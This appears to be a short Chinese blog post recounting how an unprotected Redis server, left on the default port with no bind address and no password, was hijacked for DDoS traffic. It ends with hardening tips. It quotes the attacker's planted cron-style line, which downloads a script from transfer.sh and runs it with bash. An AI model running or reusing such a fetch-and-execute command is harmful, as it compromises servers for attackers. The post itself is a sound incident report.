首先声明:因为刚入手实例,网站还在申请中。故只是搭建个redis集群供远程测试调用方便而已。因为机器上并没有项目和其他东西,为了方便redis使用的默认端口。最重要的是:配置文件中bind:标签并没有绑定ip,并且redis访问设置并没有设置密码,这就是悲剧的开始。
4月10号阿里云发邮件称服务器实例通过6379端口向外发出ddos攻击,我心里猜测应该就是通过redis被黑了。登录实例发现有一个进程.gcg进程。该进程占用cpu99%。通过查找redis的aof持久化文件,发现黑客写入如下命令:
/2 * curl -s https://transfer.sh/QGpty/tmp.aXNXdOOWFw > .cmd && bash .cmd
https://transfer.sh是一个命令行脚本自由存储下载网站,利用该操作下载并且自动安装了一些东西。最后初始化磁盘完事。
感悟:网络安全无小事,任何的侥幸心理都不可有。对于redis的使用,尽量不要暴露在公网ip之下,并且不要使用默认端口,最好绑定可使用ip和设置密码等等。